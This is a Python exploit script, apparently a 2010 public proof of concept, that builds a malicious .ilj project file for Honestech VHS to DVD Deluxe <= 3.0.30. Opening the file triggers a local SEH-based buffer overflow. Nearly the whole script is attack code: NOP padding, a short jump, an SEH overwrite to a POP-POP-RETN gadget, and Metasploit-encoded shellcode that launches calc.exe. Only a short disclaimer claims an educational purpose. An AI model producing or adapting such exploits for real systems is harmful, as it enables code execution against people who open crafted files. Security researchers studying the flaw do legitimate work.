#!/usr/bin/python # # Exploit Title: Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH) # Date: September 16, 2010 # Author: Brennon Thomas thomab310@gmail.com # Software Link: n/a # Version: <= 3.0.30.0 Deluxe # Tested on: Windows XP SP2/SP3 using Honestech VHS to DVD 3.0.2 and 3.0.30.0 # # Usage: This python script generates the malicious .ilj project file. # Open Honestech VHS to DVD <= 3.0.30 Deluxe in Advanced mode and # load the corrupt file. # # Exploit is for education purposes only. Author takes no responsibility # for what you do with it. #Required file text buf = "\r\n\ \r\n\ \r\n\ \r\n\ [MAINDLG]\r\n\ PAGE=0\r\n\ \r\n\ [AVICODEC]\r\n\ VIDEOCODEC=DivX 6.8.5 Codec (2 Logical CPUs)\r\n\ AUDIOCODEC=MPEG Layer-3\r\n\ \r\n\ [WMVINFO]\r\n\ TITLE= \r\n\ AUTHOR= \r\n\ COPYRIGHT= \r\n\ DESCRIPTION= \r\n\ \r\n\ [CAPTUREINFO]\r\n\ OUTPUTFOLDER=E:\\misc\\\r\n\ STATE=0,1,1,0,4396,4,1,0,0\r\n\ \r\n\ [BURNINFO]\r\n\ STATE=0,0,0,0,0,0\r\n\ TEMPFOLDER=E:\\misc\\\r\n\ VIDEOTSFOLDER=E:\\misc\\\r\n\ IMAGEFOLDER=E:\\misc\\\r\n\ \r\n\ [FILELIST]\r\n\ FILE=E:\\" buf += "\x90"*257 #Junk buf += "\xeb\x08\x90\x90" #JMP SHORT 8, NOP Padding buf += "\xba\x25\x31\x58" #SEH Overwrite to POP,POP,RETN in msg723.acm buf += "\x90"*16 #NOP Buffer #msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -b '\x00\x0a\x0d\x2c' -t c #[*] x86/shikata_ga_nai succeeded with size 228 (iteration=1) buf += ("\xbe\xf9\x89\xfa\xaa\xdb\xca\xd9\x74\x24\xf4\x33\xc9\xb1\x33" "\x5d\x31\x75\x13\x83\xed\xfc\x03\x75\xf6\x6b\x0f\x56\xe0\xe5" "\xf0\xa7\xf0\x95\x79\x42\xc1\x87\x1e\x06\x73\x18\x54\x4a\x7f" "\xd3\x38\x7f\xf4\x91\x94\x70\xbd\x1c\xc3\xbf\x3e\x91\xcb\x6c" "\xfc\xb3\xb7\x6e\xd0\x13\x89\xa0\x25\x55\xce\xdd\xc5\x07\x87" "\xaa\x77\xb8\xac\xef\x4b\xb9\x62\x64\xf3\xc1\x07\xbb\x87\x7b" "\x09\xec\x37\xf7\x41\x14\x3c\x5f\x72\x25\x91\x83\x4e\x6c\x9e" "\x70\x24\x6f\x76\x49\xc5\x41\xb6\x06\xf8\x6d\x3b\x56\x3c\x49" "\xa3\x2d\x36\xa9\x5e\x36\x8d\xd3\x84\xb3\x10\x73\x4f\x63\xf1" "\x85\x9c\xf2\x72\x89\x69\x70\xdc\x8e\x6c\x55\x56\xaa\xe5\x58" "\xb9\x3a\xbd\x7e\x1d\x66\x66\x1e\x04\xc2\xc9\x1f\x56\xaa\xb6" "\x85\x1c\x59\xa3\xbc\x7e\x34\x32\x4c\x05\x71\x34\x4e\x06\xd2" "\x5c\x7f\x8d\xbd\x1b\x80\x44\xfa\xd3\xca\xc5\xab\x7b\x93\x9f" "\xe9\xe6\x24\x4a\x2d\x1e\xa7\x7f\xce\xe5\xb7\xf5\xcb\xa2\x7f" "\xe5\xa1\xbb\x15\x09\x15\xbc\x3f\x6a\xf8\x2e\xa3\x43\x9f\xd6" "\x46\x9c\x55") buf += "\x90"*(6000-(len(buf))) #NOP Buffer buf += ",0,7462,885953024,4,1,640,480\r\n" #Required file text f = open("sploit.ilj", "w") f.write(buf) f.close()